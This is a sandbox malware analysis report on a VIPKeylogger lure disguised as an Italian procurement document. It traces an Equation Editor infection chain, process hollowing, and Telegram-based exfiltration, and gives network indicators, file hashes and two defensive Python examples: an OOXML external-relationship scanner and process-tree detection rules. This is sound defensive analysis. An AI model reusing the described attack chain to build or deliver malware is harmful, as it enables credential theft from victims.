Malware Analysis Report

2024-11-13 15:34

Sample ID 241003-pzh12sxhjr
Target RICHIESTA_OFFERTA_RDO2400423.docx.doc
SHA256 b5b6a451d04745638c7ecf24dbcc73655bb5942bf63a8da317bd7a6badb8dddf
Tags: vipkeylogger, discovery, keylogger, stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: b5b6a451d04745638c7ecf24dbcc73655bb5942bf63a8da317bd7a6badb8dddf

Threat Level: Known bad

The file RICHIESTA_OFFERTA_RDO2400423.docx.doc was found to be: Known bad.

Analyst summary, derived from the two detonations below. The lure name is Italian ("richiesta offerta", RDO = request for quotation, a procurement theme) and carries a double extension; the sandbox opened it as a plain .docx. In the Windows 7 / Office 2010 run (behavioral1) the chain is: WINWORD.EXE opens the document, which references content outside the package, and a second document, tmtzxc[1].doc (SHA256 fd1ca8e9ebe962f23b55669ea495bdb32073b7359031e80a7067d387c0bfa8dc), lands in the IE cache. The only plain-HTTP host contacted before that, in both runs, is 154.216.20.22:80, so that address is almost certainly where the second stage is served from. That document launches EQNEDT32.EXE (Equation Editor, started by DCOM with -Embedding) and gets code running inside it: the Equation Editor process makes its own network requests to drive.google.com and drive.usercontent.google.com and then spawns C:\Users\Admin\AppData\Roaming\tmtcy20306.exe (SHA256 a44de00550c4b3adc9409fd1fb559cab02a9efab1a1352ff07b896a2cea98678) as PID 1960; the WriteProcessMemory events from PID 2432 into 1960 are the parent setting up that child. The dropped file is NSIS-built (the nst7CA2.tmp\System.dll it extracts is the NSIS System plugin). It writes C:\Windows\resources\0409\reproductivity.ini, starts a second copy of itself (PID 2944), writes into that copy and sets its thread context, which is process hollowing, and hides its threads from debuggers (NtCreateThreadEx / NtSetInformationThread with HideFromDebugger). The hollowed copy looks up the external IP (checkip.dyndns.org, reallyfreegeoip.org) and connects to api.telegram.org:443, consistent with Telegram-bot exfiltration. The memory dumps for PID 2944 (0x00480000-0x014E2000) are where to look for the unpacked keylogger.

In the Windows 10 / Office 16 run (behavioral2) only the first stage fires: the document is fetched from 154.216.20.22:80 again, but no EQNEDT32.EXE process is created and nothing is dropped, because Equation Editor was removed from Office in the January 2018 updates. A Windows 7 / Office 2010 image, or any build that still ships EQNEDT32.EXE, is needed to see the full chain.

Malicious Activity Summary

vipkeylogger discovery keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Abuses OpenXML format to download file from external location

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Launches Equation Editor

Uses Task Scheduler COM API

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-10-03 12:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-03 12:45

Reported

2024-10-03 12:48

Platform

win7-20240708-en

Max time kernel

132s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com (×2) | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe (×2) | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1960 set thread context of 2944 | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
File opened for modification | C:\Windows\resources\0409\reproductivity.ini | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe (×2) | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2432 wrote to memory of 1960 (×4) | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 (×6) | N/A | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe | C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 2856 wrote to memory of 2084 (×4) | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe

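The "Abuses OpenXML format to download file from external location" signature above fires because a .docx is a zip package whose parts are wired together by .rels files, and a relationship with TargetMode="External" can point Word at an HTTP URL that it fetches on open. The scanner below is an added example written for this report, not sandbox or vendor code: it opens a .docx, lists every external relationship in every .rels part (so it also catches a remote template in word/_rels/settings.xml.rels, not only the OLE-object case in this sample), and keeps the ones Word resolves without a click over HTTP(S), flagging raw-IP targets like this sample's 154.216.20.22. The document it builds is constructed for the demonstration; http://192.0.2.10/tmtzxc.doc is a placeholder and the AUTO_FETCH_TYPES set is this example's assumption about which relationship types Word loads automatically.

```python
"""Find OOXML relationships that make Word fetch content from outside the package.

Added example for this report; not sandbox or vendor code. The document built
by build_sample_docx is constructed, and http://192.0.2.10/tmtzxc.doc is a
placeholder URL, not the address the real sample used.
"""
import io
import ipaddress
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS_URI = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_NS_URI
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves as soon as the document is opened (no click
# needed). A remote Target on one of these is what the sandbox reports as
# "Abuses OpenXML format to download file from external location". This set
# is an assumption of the example, chosen from the types Word auto-loads.
AUTO_FETCH_TYPES = {"oleObject", "frame", "attachedTemplate", "subDocument", "image"}


def external_relationships(docx_bytes):
    """Every relationship in any .rels part whose TargetMode is External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                hits.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                })
    return hits


def _is_raw_ip(host):
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def suspicious_relationships(docx_bytes):
    """External relationships Word will fetch on open over HTTP(S).

    Hyperlinks are external too but need a click, so they are left out.
    raw_ip marks targets addressed by IP rather than hostname, as in this
    sample's 154.216.20.22:80 fetch."""
    out = []
    for hit in external_relationships(docx_bytes):
        url = urlparse(hit["target"])
        if hit["type"] in AUTO_FETCH_TYPES and url.scheme in ("http", "https"):
            hit["raw_ip"] = _is_raw_ip(url.hostname or "")
            out.append(hit)
    return out


def build_sample_docx(external_target=None):
    """Constructed minimal .docx; with external_target set, the document part
    carries an OLE-object relationship pointing at that URL."""
    rels = ['<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>' % OFFICE_REL]
    if external_target:
        rels.append('<Relationship Id="rId2" Type="%soleObject" Target="%s" TargetMode="External"/>'
                    % (OFFICE_REL, external_target))
    doc_rels = ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">%s</Relationships>'
                % (REL_NS_URI, "".join(rels)))
    pkg_rels = ('<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
                '<Relationship Id="rId1" Type="%sofficeDocument" Target="word/document.xml"/>'
                '</Relationships>' % (REL_NS_URI, OFFICE_REL))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", pkg_rels)
        zf.writestr("word/document.xml", '<?xml version="1.0"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in suspicious_relationships(build_sample_docx("http://192.0.2.10/tmtzxc.doc")):
        print(hit)
```

Run it against a real file with `suspicious_relationships(open(path, "rb").read())`; an empty list means no auto-fetched remote content, which is the expected result for a benign quotation request. A hit with raw_ip set, as here, is worth blocking on its own, since legitimate templates and embedded objects are not served from bare IP addresses.
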
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

"C:\Users\Admin\AppData\Roaming\tmtcy20306.exe"

C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

"C:\Users\Admin\AppData\Roaming\tmtcy20306.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

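The process tree and the WriteProcessMemory / SetThreadContext rows above reduce to three behaviours a detection engineer can key on: Equation Editor spawning a child outside Program Files or Windows, Equation Editor making a network connection at all, and a process writing into a second copy of its own image and then setting that copy's thread context (the hollowing of PID 2944 by PID 1960). The rules below are an added example for this report, not sandbox or vendor code. EVENTS is a hand-built event list in the shape of the report's process and API rows; the Explorer and svchost.exe parents and the target PIDs are this example's assumptions, and the benign WINWORD.EXE to splwow64.exe write is included so the self-injection rule can be seen ignoring cross-image writes.

```python
"""Process-tree rules for the behaviours seen in the Windows 7 run, over constructed events.

Added example for this report, not sandbox code. EVENTS mirrors the report's
process tree; the explorer.exe and svchost.exe parents and the event order are
assumptions made for the example.
"""
import os

EQNEDT = "eqnedt32.exe"
# Images under these prefixes are treated as legitimately installed software.
TRUSTED_DIRS = ("c:\\program files", "c:\\windows")

WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\Admin\AppData\Roaming\tmtcy20306.exe"
SPLWOW = r"C:\Windows\splwow64.exe"

EVENTS = [
    {"kind": "process_create", "pid": 2856, "image": WINWORD, "parent_image": r"C:\Windows\explorer.exe"},
    # Equation Editor is started by DCOM (-Embedding), so its parent is not WINWORD.EXE.
    {"kind": "process_create", "pid": 2432, "image": EQN, "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"kind": "network_connect", "pid": 2432, "image": EQN, "dst": "drive.google.com:443"},
    {"kind": "process_create", "pid": 1960, "image": DROPPED, "parent_image": EQN},
    {"kind": "write_memory", "pid": 2432, "image": EQN, "target_pid": 1960, "target_image": DROPPED},
    {"kind": "process_create", "pid": 2944, "image": DROPPED, "parent_image": DROPPED},
    {"kind": "write_memory", "pid": 1960, "image": DROPPED, "target_pid": 2944, "target_image": DROPPED},
    {"kind": "write_memory", "pid": 1960, "image": DROPPED, "target_pid": 2944, "target_image": DROPPED},
    {"kind": "set_thread_context", "pid": 1960, "image": DROPPED, "target_pid": 2944, "target_image": DROPPED},
    # Benign noise the rules must not flag: Word driving the print spooler helper.
    {"kind": "write_memory", "pid": 2856, "image": WINWORD, "target_pid": 2084, "target_image": SPLWOW},
]


def _basename(path):
    return os.path.basename(path.replace("\\", "/")).lower()


def rule_equation_editor_child(events):
    """EQNEDT32.EXE spawning a process that lives outside Program Files / Windows."""
    return [
        ("equation_editor_spawns_untrusted_child", e["pid"], e["image"])
        for e in events
        if e["kind"] == "process_create"
        and _basename(e["parent_image"]) == EQNEDT
        and not e["image"].lower().startswith(TRUSTED_DIRS)
    ]


def rule_equation_editor_network(events):
    """Equation Editor has no legitimate reason to touch the network."""
    return [
        ("equation_editor_network", e["pid"], e["dst"])
        for e in events
        if e["kind"] == "network_connect" and _basename(e["image"]) == EQNEDT
    ]


def rule_self_injection(events):
    """A process writes into a process with the same image path and then sets
    its thread context: the hollowing pattern reported for PID 1960 -> 2944.
    Writes alone are not enough; the context switch is what completes it."""
    written, reported, out = set(), set(), []
    for e in events:
        if e["kind"] not in ("write_memory", "set_thread_context"):
            continue
        if e["image"].lower() != e["target_image"].lower():
            continue
        pair = (e["pid"], e["target_pid"])
        if e["kind"] == "write_memory":
            written.add(pair)
        elif pair in written and pair not in reported:
            reported.add(pair)
            out.append(("self_injection", e["pid"], "hollowed pid %d" % e["target_pid"]))
    return out


def run_rules(events):
    findings = []
    for rule in (rule_equation_editor_child, rule_equation_editor_network, rule_self_injection):
        findings.extend(rule(events))
    return findings


if __name__ == "__main__":
    for finding in run_rules(EVENTS):
        print(*finding)
```

The self-injection rule deliberately requires both a memory write and a thread-context change between the same PID pair, which is why the four WINWORD.EXE to splwow64.exe writes and the EQNEDT32.EXE to tmtcy20306.exe writes (different images, and no SetThreadContext) produce nothing; in a real pipeline the same two conditions map onto Sysmon event 10 (ProcessAccess) plus an EDR thread-context telemetry source.
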
Network

Country | Destination | Domain | Proto | Hits
US | 154.216.20.22:80 | 154.216.20.22 | tcp | 3
US | 8.8.8.8:53 | drive.google.com | udp | 1
GB | 216.58.212.206:443 | drive.google.com | tcp | 1
US | 8.8.8.8:53 | c.pki.goog | udp | 1
GB | 172.217.169.67:80 | c.pki.goog | tcp | 1
US | 8.8.8.8:53 | o.pki.goog | udp | 1
GB | 172.217.169.67:80 | o.pki.goog | tcp | 1
US | 8.8.8.8:53 | drive.usercontent.google.com | udp | 1
GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp | 1
US | 8.8.8.8:53 | checkip.dyndns.org | udp | 1
US | 193.122.130.0:80 | checkip.dyndns.org | tcp | 1
US | 8.8.8.8:53 | reallyfreegeoip.org | udp | 1
US | 104.21.67.152:443 | reallyfreegeoip.org | tcp | 1
US | 8.8.8.8:53 | api.telegram.org | udp | 1
NL | 149.154.167.220:443 | api.telegram.org | tcp | 1
US | 8.8.8.8:53 | crl.microsoft.com | udp | 1
GB | 2.19.117.22:80 | crl.microsoft.com | tcp | 1
US | 8.8.8.8:53 | www.microsoft.com | udp | 1
GB | 2.17.5.133:80 | www.microsoft.com | tcp | 1

Reading the table: 154.216.20.22:80 (a bare IP, no DNS lookup) is the second-stage document fetch; drive.google.com and drive.usercontent.google.com are the payload download made by EQNEDT32.EXE; c.pki.goog, o.pki.goog and crl.microsoft.com are certificate revocation checks triggered by the TLS connections; checkip.dyndns.org, reallyfreegeoip.org and api.telegram.org belong to the hollowed tmtcy20306.exe copy and are the indicators to alert on.

Files

memory/2856-0-0x000000002FEA1000-0x000000002FEA2000-memory.dmp

memory/2856-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2856-2-0x000000007183D000-0x0000000071848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{9DF86D27-8A7D-4027-98EB-50F64C078FA4}

MD5 cc47876dc035fe3ca48192948d806ca1
SHA1 2a67a271b0f7b4cbadaef8afb85c234465e418b3
SHA256 01b6eb6b3a4c786e7881283337e990a9195ee11204808edd7f43a1476bf221db
SHA512 a7a3ed210010100c1820f8602cc13d2f734d6cd062aad8b751c36182b765554429586bcf7730c8918364b59afc784e761d96e9eb02b3820b3fee5ca6c843591c

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{07078B2D-E8BE-4FA2-B2D3-55C5D1E2E060}.FSD

MD5 d092ebfa8426820fb3e3c8e67cb6d545
SHA1 58e62650481a2e3a6c5b31c2480e9f1cbbdef133
SHA256 31b8185e91e90345cbec364bb458a4880c3ae513d767d681f034e3e980c2027b
SHA512 a5937d567e799e2f405b98ea760f8379e0301418b3e0e58d8d29162c6add23f7089325bc018b2f77c626331ced367e496d3f903fe5a2e03c903d10f44852e901

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 0a3b5d78829fe3da64cb94f6c4a8613d
SHA1 462fcedeceb308b8fb99ba2ab00031cf256f8942
SHA256 7b88abc149f95151cba12395110e77ec162ee650efcd7add633bb67b92ab1675
SHA512 b459bb526d3b9c78be35b68f7dc6dda6abe9d7254aea932aa512f5edff1c785675fee54b49af30a569d4cb1afc99b6d5da994ffdca963c3d9caeb60a32a82e29

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\tmtzxc[1].doc

MD5 08d1a4e26971fd55013dbc7d2744b2a5
SHA1 dd813694fc67b536f242ae7dd3deff14458b82ba
SHA256 fd1ca8e9ebe962f23b55669ea495bdb32073b7359031e80a7067d387c0bfa8dc
SHA512 3c34748ed68738a24d6c7f1482b4b2f5a26fb6c2a85a1fc0a5303123928fb56974532af9d43b9bb9027558a03be79cf31b48a0c4cb28c41fd833f25e8bb035b6

\Users\Admin\AppData\Roaming\tmtcy20306.exe

MD5 f7e702effaaad33faa0cbc4f87da2d07
SHA1 b8be783f38b987f8c88f7de258d69a648033be72
SHA256 a44de00550c4b3adc9409fd1fb559cab02a9efab1a1352ff07b896a2cea98678
SHA512 43e29d3926317d7234f333e41177cafce5e4bd297d3a854f7959aad341eb68748b57113c41bf9173b5d838c7460ca146c21ba2dbf982535e5ad736118773cec9

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 7b4cd0c80af21ca197305de4d8258f44
SHA1 cd8f4d39a939711c5f40ab6507b0c8a161d9a0d8
SHA256 36563513f6361fd28ef63676a26e57bfe8b5fc4fd5ac311e61a613f4d9b8ca18
SHA512 2bb7fc23d397ed28489621bc6fc93b0f06c2d4093097958c28fad821d8175a924695f6c6983be66b3268409322245a13398fc0d7c732f6576e0da0184fc8cd31

\Users\Admin\AppData\Local\Temp\nst7CA2.tmp\System.dll

MD5 9625d5b1754bc4ff29281d415d27a0fd
SHA1 80e85afc5cccd4c0a3775edbb90595a1a59f5ce0
SHA256 c2f405d7402f815d0c3fadd9a50f0bbbb1bab9aa38fe347823478a2587299448
SHA512 dce52b640897c2e8dbfd0a1472d5377fa91fb9cf1aeff62604d014bccbe5b56af1378f173132abeb0edd18c225b9f8f5e3d3e72434aed946661e036c779f165b

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2856-113-0x000000007183D000-0x0000000071848000-memory.dmp

memory/2944-136-0x0000000000480000-0x00000000014E2000-memory.dmp

memory/2944-137-0x0000000000480000-0x00000000014E2000-memory.dmp

memory/2944-138-0x0000000000480000-0x00000000004C8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-03 12:45

Reported

2024-10-03 12:48

Platform

win10v2004-20240802-en

Max time kernel

133s

Max time network

123s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx" /o ""

Signatures

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (×2) | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeAuditPrivilege | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

The three signatures above carry no process rows, and WINWORD.EXE was the only process in this detonation (see Processes), so they reflect Office's own use of the Task Scheduler and Volume Shadow Copy interfaces. The persistence and ransomware tags are the sandbox's generic labels for those APIs, not evidence that the payload ran on Windows 10: no EQNEDT32.EXE was launched and no executable was dropped in this run.

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx" /o ""

Network

Country | Destination | Domain | Proto | Hits
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp | 1
NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp | 1
US | 154.216.20.22:80 | 154.216.20.22 | tcp | 2
US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 22.20.216.154.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp | 1
GB | 2.18.63.57:443 | metadata.templates.cdn.office.net | tcp | 1
US | 8.8.8.8:53 | 57.63.18.2.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp | 1
GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp | 36
US | 8.8.8.8:53 | 150.117.19.2.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp | 1

Reading the table: the in-addr.arpa queries are the Windows 10 image's reverse lookups of the addresses it talked to (22.20.216.154.in-addr.arpa is 154.216.20.22 reversed); the officeapps, templates.cdn.office.net and Microsoft destinations are Office 16's own start-up traffic. The only destination attributable to the sample is 154.216.20.22:80, the same second-stage fetch seen in the Windows 7 run, and nothing follows it because no Equation Editor process exists to continue the chain.

Files

memory/2420-0-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-1-0x00007FFE07A2D000-0x00007FFE07A2E000-memory.dmp

memory/2420-2-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-3-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-6-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-5-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-4-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-9-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-12-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-16-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-17-0x00007FFDC5820000-0x00007FFDC5830000-memory.dmp

memory/2420-15-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-14-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-13-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-11-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-10-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-8-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-7-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-19-0x00007FFDC5820000-0x00007FFDC5830000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4329235D\tmtzxc[1].doc

MD5 08d1a4e26971fd55013dbc7d2744b2a5
SHA1 dd813694fc67b536f242ae7dd3deff14458b82ba
SHA256 fd1ca8e9ebe962f23b55669ea495bdb32073b7359031e80a7067d387c0bfa8dc
SHA512 3c34748ed68738a24d6c7f1482b4b2f5a26fb6c2a85a1fc0a5303123928fb56974532af9d43b9bb9027558a03be79cf31b48a0c4cb28c41fd833f25e8bb035b6

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 5fc1623354fdbbbbff11c2a2aa132f92
SHA1 d0d3c0b5a955e67ce2341d3a0cbb6ef0ac79dcc0
SHA256 d4058c628c70dbf0b45005a0816294305aa04f41e0b7da7e5d2eeb3db7e53184
SHA512 09a415dc3374b0adb92ff1af29737c4bcf0b5e4ec3ac72f2de41d5cee6f6b32213f0577f003522593869795846d0aff3caf3321e061f8d98cbb2e58afbd13a6f

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/2420-79-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-80-0x00007FFE07A2D000-0x00007FFE07A2E000-memory.dmp

memory/2420-81-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

